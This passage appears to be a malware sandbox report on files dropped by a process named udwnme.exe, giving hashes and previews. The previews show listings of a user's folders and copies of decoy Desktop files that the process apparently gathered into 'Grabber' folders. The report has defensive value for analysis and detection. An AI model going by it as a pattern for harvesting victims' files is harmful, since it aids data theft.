                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):834
                                                                  Entropy (8bit):5.282690409163236
                                                                  Encrypted:false
                                                                  SSDEEP:24:qZksCeg1LFTNkY+kfAwj9PjM1YZI5OLcx0gaaFPRYZj:0eeijbfThPAaGNR2j
                                                                  MD5:D2A64505CE2CDB3ACC359558743D90D9
                                                                  SHA1:A1C29490252DBF587AE10FA7BA7D9A7947685664
                                                                  SHA-256:8F321EEE94AA42B17CC49846693023D517E193EAB9F5394A06A91C375CA6E0CC
                                                                  SHA-512:02DDACFA7ACD8FF75150D2778F7DB0319E53B7C76E52B4CEA13C58003817355DD8986E6D4646448B3B0BBA6629E44191DA6BF25EB702FF862B00FF4D9A200C7E
                                                                  Malicious:false
                                                                  Preview:Documents\...BPMLNOBVSB\...FENIVHOIKN\...KATAXZVCPS\....KATAXZVCPS.docx....LTKMYBSEYZ.xlsx....RAYHIWGKDI.png....WKXEWIOTXI.mp3....YPSIACHYXW.pdf....ZBEDCJPBEY.jpg...LTKMYBSEYZ\...My Music\...My Pictures\...My Videos\...NWTVCDUMOB\...ONBQCLYSPU\....DVWHKMNFNN.mp3....HTAGVDFUIE.png....KATAXZVCPS.jpg....ONBQCLYSPU.docx....UMMBDNEQBN.pdf....VLZDGUKUTZ.xlsx...SFPUSAFIOL\...SQRKHNBNYN\...VLZDGUKUTZ\....DVWHKMNFNN.pdf....KATAXZVCPS.xlsx....NWTVCDUMOB.jpg....VLZDGUKUTZ.docx....YPSIACHYXW.png....ZBEDCJPBEY.mp3...desktop.ini...DVWHKMNFNN.mp3...DVWHKMNFNN.pdf...HTAGVDFUIE.png...JSDNGYCOWY.mp3...KATAXZVCPS.docx...KATAXZVCPS.jpg...KATAXZVCPS.xlsx...LTKMYBSEYZ.xlsx...NWTVCDUMOB.jpg...ONBQCLYSPU.docx...RAYHIWGKDI.png...UMMBDNEQBN.pdf...VLZDGUKUTZ.docx...VLZDGUKUTZ.xlsx...WKXEWIOTXI.mp3...YPSIACHYXW.pdf...YPSIACHYXW.png...ZBEDCJPBEY.jpg..

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Directories\Downloads.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):338
                                                                  Entropy (8bit):5.287107822500106
                                                                  Encrypted:false
                                                                  SSDEEP:6:3tSLKIyeWrhjWvqj0/m/DvROLXovs0OLPFEKC+PJhr4rmsAnThmyGFNos4hwk4q:QLKPeaiCw/m/zoL4vszLPFEK1h9mmsAf
                                                                  MD5:D9614CBA928B54F7FC5B4C0C735D6B78
                                                                  SHA1:40EEF1EE5AF3AB6E97FD76DD125B936FD92A093C
                                                                  SHA-256:D85AA8C4750E3D5273FA7B69C6989B3A3BD02D392A86B05FAE42D615BCF42AAF
                                                                  SHA-512:2486CF1BB34CD3BF82EBBEE3BC0B12821F9F6F6C3EB35F5C6BE64D1E808CC32D2B025AF2E09DA44EC748B67714B6BF66B34FA2A3BE65F503B673116F3F5C0324
                                                                  Malicious:false
                                                                  Preview:Downloads\...desktop.ini...DVWHKMNFNN.mp3...HTAGVDFUIE.png...HTAGVDFUIE.xlsx...KATAXZVCPS.docx...KATAXZVCPS.jpg...KZWFNRXYKI.png...LTKMYBSEYZ.pdf...LTKMYBSEYZ.xlsx...ONBQCLYSPU.docx...RAYHIWGKDI.png...UMMBDNEQBN.docx...UMMBDNEQBN.pdf...VLZDGUKUTZ.xlsx...WKXEWIOTXI.mp3...WUTJSCBCFX.jpg...YPSIACHYXW.pdf...ZBEDCJPBEY.jpg...ZBEDCJPBEY.mp3..

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Directories\OneDrive.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):25
                                                                  Entropy (8bit):4.023465189601646
                                                                  Encrypted:false
                                                                  SSDEEP:3:1hiR8LKB:14R8LKB
                                                                  MD5:966247EB3EE749E21597D73C4176BD52
                                                                  SHA1:1E9E63C2872CEF8F015D4B888EB9F81B00A35C79
                                                                  SHA-256:8DDFC481B1B6AE30815ECCE8A73755862F24B3BB7FDEBDBF099E037D53EB082E
                                                                  SHA-512:BD30AEC68C070E86E3DEC787ED26DD3D6B7D33D83E43CB2D50F9E2CFF779FEE4C96AFBBE170443BD62874073A844BEB29A69B10C72C54D7D444A8D86CFD7B5AA
                                                                  Malicious:false
                                                                  Preview:OneDrive\...desktop.ini..

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Directories\Pictures.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):88
                                                                  Entropy (8bit):4.450045114302317
                                                                  Encrypted:false
                                                                  SSDEEP:3:YzIVqIPLKmwHW8LKKrLKB:nqyLKmYNLKCLKB
                                                                  MD5:D430E8A326E3D75F5E49C40C111646E7
                                                                  SHA1:D8F2494185D04AB9954CD78268E65410768F6226
                                                                  SHA-256:22A45B5ECD9B66441AE7A7AB161C280B6606F920A6A6C25CD7B9C2D4CEB3254D
                                                                  SHA-512:1E8139844D02A3009EE89E2DC33CF9ED79E988867974B1291ABA8BC26C30CB952F10E88E0F44A4AEEE162A27E71EAA331CF8AC982B4179DC8203F6F7280BA5AE
                                                                  Malicious:false
                                                                  Preview:Pictures\...Camera Roll\....desktop.ini...Saved Pictures\....desktop.ini...desktop.ini..

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Directories\Startup.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):24
                                                                  Entropy (8bit):4.053508854797679
                                                                  Encrypted:false
                                                                  SSDEEP:3:jgBLKB:j4LKB
                                                                  MD5:68C93DA4981D591704CEA7B71CEBFB97
                                                                  SHA1:FD0F8D97463CD33892CC828B4AD04E03FC014FA6
                                                                  SHA-256:889ED51F9C16A4B989BDA57957D3E132B1A9C117EE84E208207F2FA208A59483
                                                                  SHA-512:63455C726B55F2D4DE87147A75FF04F2DAA35278183969CCF185D23707840DD84363BEC20D4E8C56252196CE555001CA0E61B3F4887D27577081FDEF9E946402
                                                                  Malicious:false
                                                                  Preview:Startup\...desktop.ini..

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Directories\Temp.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):4413
                                                                  Entropy (8bit):5.281551820547492
                                                                  Encrypted:false
                                                                  SSDEEP:96:4jzcRPTmt6qESfxLJNebQVuLBYwrbIGV86EdotkTLD8ls6Owq:BtbSJLJ4cUtDUKSiq
                                                                  MD5:76D94AB00A4A774A0D8035B8AACEC7F4
                                                                  SHA1:271376FE2851FC59E37DA9B7E482D4A6C3FAF0C9
                                                                  SHA-256:A4E57D1CA4CBEA4CE2917CA8C5D7BCCC7BE6544696C51A705EF4169995946871
                                                                  SHA-512:A36ECC7791F6F4D5589254DD2CBAC1EDC76CDCB25E6C241923F5DC55C5F1116D3FC4D92DE8037B640A480A2B5F899527FB06302721129689E6F0CC6BA68B1DBF
                                                                  Malicious:false
                                                                  Preview:Temp\...acrobat_sbx\....Adobe\.....Acrobat\......DC\....NGL\.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-00-50-743.log.....NGLClient_AcrobatReader123.6.20320.6 2023-10-04 13-01-22-078.log.....NGLClient_AcrobatReader123.6.20320.6.log....acroNGLLog.txt...acrocef_low\...acrord32_super_sbx\....Adobe\.....Acrobat\......DC\.......SearchEmbdIndex\...Diagnostics\....EXCEL\.....App1696334775820156800_6EB929AF-656E-4F43-9731-EA7753E1F1BD.log.....App1696334923056622400_BD966DD2-7850-423A-B1D8-7882CE1A6D15.log.....App1696417072488237400_C12D9B44-3468-47BC-9418-BF0A674A2B2F.log.....App1696417101742322600_290EFEE9-C25A-4857-9F32-D7E6D51B7C09.log.....App1696417118050662300_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App1696417118051710600_8475A8C9-2447-4BC4-8E46-350AA0582B94.log.....App_1696413198165042300_AA3FCB9C-CF1A-4407-8A94-A7D6C220021F.log...Low\...mozilla-temp-files\...Symbols\....ntkrnlmp.pdb\.....68A17FAF3012B7846079AEECDBE0A5831\......download.error......ntkrnlmp.pdb....winload

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Directories\Videos.txt

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):23
                                                                  Entropy (8bit):3.7950885863977324
                                                                  Encrypted:false
                                                                  SSDEEP:3:k+JrLKB:k+JrLKB
                                                                  MD5:1FDDBF1169B6C75898B86E7E24BC7C1F
                                                                  SHA1:D2091060CB5191FF70EB99C0088C182E80C20F8C
                                                                  SHA-256:A67AA329B7D878DE61671E18CD2F4B011D11CBAC67EA779818C6DAFAD2D70733
                                                                  SHA-512:20BFEAFDE7FEC1753FEF59DE467BD4A3DD7FE627E8C44E95FE62B065A5768C4508E886EC5D898E911A28CF6365F455C9AB1EBE2386D17A76F53037F99061FD4D
                                                                  Malicious:false
                                                                  Preview:Videos\...desktop.ini..

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\DVWHKMNFNN.pdf

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.694985340190863
                                                                  Encrypted:false
                                                                  SSDEEP:24:fGg1AbmVALQm72DOg+8XDQzjmyhdsENw8TRlrlGpKTkA+oBK:fv1AiVAUmyDruzj37sENjlSKAA+oU
                                                                  MD5:C9386BC43BF8FA274422EB8AC6BAE1A9
                                                                  SHA1:2CBDE59ADA19F0389A4C482667EC370D68F51049
                                                                  SHA-256:F0CC9B94627F910F2A6307D911B1DDD7D1DB69BAD6068EF3331549F3A0877446
                                                                  SHA-512:7AACA07E8A4B34E0F75B16B6F30686AC3FB2D5CBDAD92E5934819F969BAFF59385FB8F997334313EA5938FD955D6175C4548D6B1F915D652D9D9201C9418EF83
                                                                  Malicious:false
                                                                  Preview:DVWHKMNFNNSXRPFRFSVVCQPXSKWHKPJJHYQWYYFONAJQSCOHZADBHUOWOSPDVAOIQVOBHGMIENZQZLABYDKWXGSUQNSEINIQSVMZZWTJLYMGYBQHIJSUWZKJPGBZUGFOXNAMLQTVGWDCYDMNHGVRTUWNHIWXJNQONTAXVVVCFDLWYDVWNMKHRFTZAVEQPXZHSEXPEHWUHPJZDMDXPYEJBYWZOQETVPLRKQRCYTAXMNRBOUJSCYZOUPOBJUWFDMUYFBXCBLZHFHONIURELJQVLWAJRIQCHHASBUAREPSIMJIZDUKJCHMMSSWSEDFHFQOUVYZORWJIUACXUVQKUMLXTQIKDBVNZOHJYYECOBYPNRILKERBHKZPVUSQLHAQRTPWCRMZADYONIIOVUWOBVHAUGZVAGTZTZBMHSOOQORENTXCJFMVWMGLOOXBDWANXXJQQTBDTWOSPFMFVQKLNTSHOPQMHYRYZMWDXVFGWFOSCSFMKCDDHTOQHBTQAFQTXPUHHEAKYRCQIODCCSHRSAJQEFRHCQLQVVMUHWOHHQJPSHCNKRLIRESUXLZIYSWDHHYZVRKLAGFLVTEJQHEEMVUUEQKQMTBDXFGSROZTNPLCVTEEZGUUCQUEKNMQFATATJRARXQQMZYEVACDAXILYPEHYTJOQWSFAJEGHIDIXMKDXPATNSATPECIMRBZNBXXVMGPLMVEKCUOXJWFGQSTWPMTEMRCYGXECVTNKYROYRYTPRDPCFGGKUUBXXSDFZEJCQRIRFLCNMPMLIGUCYPHMWYVAIPAAPHTQAYFSJWLSCZICIXZHXNKAKRHJVENGZTUTVWSNYDDYMWQHHAITLUZXNORBLYTBVCEBWBMSVZXNZMKYFPRFPLFCUSJUWNKQJIZRVZASPVFSUSBYQZZWKEORBDDRCYRBTIMTLHDTZRQUKYJIWHXVJYPEZSDLWZVPZGEYQPCSGGVJXXBUCNBXKQPZTMTVPZUETYYLRJEDWIHAZMS

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\HTAGVDFUIE.png

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.692693183518806
                                                                  Encrypted:false
                                                                  SSDEEP:24:FrPOQ32qakAnGkyNl2g/fQJnKVOvsyX1aZKx1aHEg:53Sq9/fiK4XQfHEg
                                                                  MD5:78F042E25B7FAF970F75DFAA81955268
                                                                  SHA1:F7C4C8DDF51B3C5293E0A92F6767D308BBF568B4
                                                                  SHA-256:E4C9709AFEA9D9830CED1AA6DF1711D0332A5972688640368DDC32C07C0D5D17
                                                                  SHA-512:CE2548833F62C549CA0268BE445E517AC986CA44EA52916A153DFFE4D7FA59B703E5927DFE70836E8B082C246793DF2066D72DB4A6E1C948940E88C524952348
                                                                  Malicious:false
                                                                  Preview:HTAGVDFUIELGZFCTZZGRSQISCXMOKSCAZEJVAPBPJKABIZKEGFAGMGOIUPHPJOYIWMVIKWCNUOWDMGCFXJQANMMOULIVTQQGUZVVOLZWBYTHYOHMMVIMTTBBCAIGONNRVEUMTCTCEMTWFNDSQPHEPLAFZAKYSROZKRQDUZOUZIKJGJRIBJODHOULJHWQBIJSAIYMXLFOSFOEFKTQPEEWFTFCIFSLHXSXYXBWTPCWMCGPETOSVLNKYCONFWCIUFEQKOWQNQKJSIZKNZXOQWMTJOGWDBUFBKDXUPYYIXUTOPSOVWLVKIOKFPSXDAVMBUZIYYZUQTDLZIMRRGXLTOEJMFWLOMNPNLICPZPKTHPXELGBYTJLOJOEWNRDNMXXRYMAJBWCTNMBREIJDVVIXEHEGYQKZQCGLVHOCMUSKXCQQMURLYKWUIUMFSGYMZUQXCTZOKQYXJAUDEVTSOOQUKZKKEEOANGSIIWTUVEGHTCOTXCDTCZIFUAWDLWKDNQTUAXBCRBKEGHCEPWTXOQVBWKIXLQEUCHHRHMKWOVVBFOLNUHSLLMHOOFDQCOVQVCNKKYOGNPYFHMPHXNPOTANYIGKSXGYDKBAEAYCNSDEQRTDZXKUOIUOHOMJPCCDXHJTXLKPCLAKLUNDAFZVUXKBSBAWUIBEQFANHTKLDXHBVLMBIXZUPHFUIHTECGPPEITWIRPTQHJDDRMAQERQMDOELBOQSEMMMCCUPQVDZXOFFYQSEIDXDPFNKRGYVUDDHHQGPRFUFAJOKTJSGMHWRXPZFPTHUACEOFEZUYOSJGJLFUTHTDWBPUETPFOWWTNVGDPCHGGCYSORPYRNRZVFDIQZLGVXSZLKMPDVKQURMLSZDDXVNBPXKBLQIKBTAWLYTZWTFUNWLSZPWUWBVBXUJMBCFHPMBIRGLQAWDQTJEHKOGMUTEILXROVHXNUORTTYMCMDGNZYCCCTIABCKYPUCGPPUUSBWLIPYZKIMRHFVZCGDPKZ

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KATAXZVCPS.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KATAXZVCPS.jpg

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KATAXZVCPS.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KATAXZVCPS\KATAXZVCPS.docx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.699548026888946
                                                                  Encrypted:false
                                                                  SSDEEP:24:pjU7tPjIpNf9XSXm/5eskkSAjuenNF0hE6mHPISZMqEv:pjU7xIpfXSipuenT0hvYIV
                                                                  MD5:A0DC32426FC8BF469784A49B3D092ADC
                                                                  SHA1:0C0EEB9B226B1B19A509D9864F8ADC521BF18350
                                                                  SHA-256:A381579322A3055F468E57EA1980A523CAF16ABFE5A09B46EC709E854E67AA01
                                                                  SHA-512:DAF85E375438A2A6CC261D75D672A9C43E80E6CB1BC1EAA1BDB7B798CDE22AEFD5A04AC1D10E6F24CDBB7F9EA0452F5CA790969C750B764B4B7F9E0C5B2A0731
                                                                  Malicious:false
                                                                  Preview:KATAXZVCPSXDNCRGTIEAHLTBMQUFAYSWEMLQOMHMIKPDECBCOYPMSTTHHPDKZNGFGWCNUUGIGXPEBWCPRKDGBOWPSNMTFYIHVYITPQGJYFOAJMWVQDHVSMYHPXFGNOURBBIVVVMRPWBBLQXUCAXUFAYRSTCKWXAAMKJJZILVYZNBPSMXAGXZDASFVGKBTHNGETLQIHPRIVPIVHVCSRDUBEGENZMHSYQLROJPZILEYZIFDADQNRGHABZNQMPQMEVKVERETAQUHUXWKYTSUKUXMTSIPUXJRNZOLPGLRSFBCHYWGMRDPLBUIIFHFUNFWRALBUPZLDJUHIMNWKMISYIKAQGSLGBWBFUXASKUFXDTLJAXOSBBQTQJNJAVJQLQEFEKRWWXRJNJSWYQQKPEAVJRUZGKJUAZLPHMOTXLNXAZINYPNPZNGRMVYVCYPPHKTYJCBWNURXFTCITKLDRSFMIHFZHIDPGLOTHCQFZZEHIEXWNNZRJQLWYMVUHTXHFFDTYBHDRBRNTPLBXPVFCUVAJOYOWRENFUXTSCNCCQJOSITCFTGJHFQCYISKUAVSRYASWVJRDNOYYCSYOZWHRPNSBWMHUUEYUGOXVSYKLFZAUQJZDVBEBHHGXQHZVJWNUGLSAYWIEHAJCPIOHOPCXKNVRISBGUAEMSYEGNPQXITRIIMXOLIJYUBIEQGZQUAHRWMKQHCRHKBJZQQXFYTNBHEJEWRPZRXZCXRJQVIUOATJAEYDILREREDIWFEMISEKZWNCDTIPTTOZXOZJIYMGKYIKXBLURVWBJHYFJCLGVVIMADULTTVZIOEIPMVJAOPSQCDFMYPSPGLBIQXTWTUZERGBDTCIRRVRTNGENXXRTHESXQFUQSRGUQDQWGTGXTSGDYWIQVOKABAIAJIEUVYCZXNYVKPRREMYAVDFDHWOGEKALUPBHOHENIHLFJZAHVTJIQJBKXOYIOELCIIECJBPTTASBEKGOESRDFBACPOTNMRZOG

                                                                  C:\Users\user\AppData\Local\404488eab03b565881eb6e0d9117d2d2\user@888683_en-CH\Grabber\DRIVE-C\Users\user\Desktop\KATAXZVCPS\LTKMYBSEYZ.xlsx

                                                                  Download File
                                                                  Process:C:\Users\user\AppData\Local\Temp\udwnme.exe
                                                                  File Type:ASCII text, with very long lines (1024), with CRLF line terminators
                                                                  Category:dropped
                                                                  Size (bytes):1026
                                                                  Entropy (8bit):4.687722658485212
                                                                  Encrypted:false
                                                                  SSDEEP:24:gTVIxDsK0PxMQbXpEHH8+976o9VWmCUGGFT3IIU8wyG33bu3jUn:gZIxDW5lj02otC1G5IIUF/n
                                                                  MD5:9A59DF7A478E34FB1DD60514E5C85366
                                                                  SHA1:DE10B95426671A161E37E5CE1AD6424AB3C07D98
                                                                  SHA-256:582393A08E0952F43A544A991772B088CC77CE584F8844DE6C5246BA36E703D5
                                                                  SHA-512:70B4673D358E097AB2B75633A64A19C16E1422C81B6B198D81BF17B7609BFB4ACF5DE36228FF3884C5B9BA0A15E13F56C94968E5136B497C826F3D201A971B00
                                                                  Malicious:false
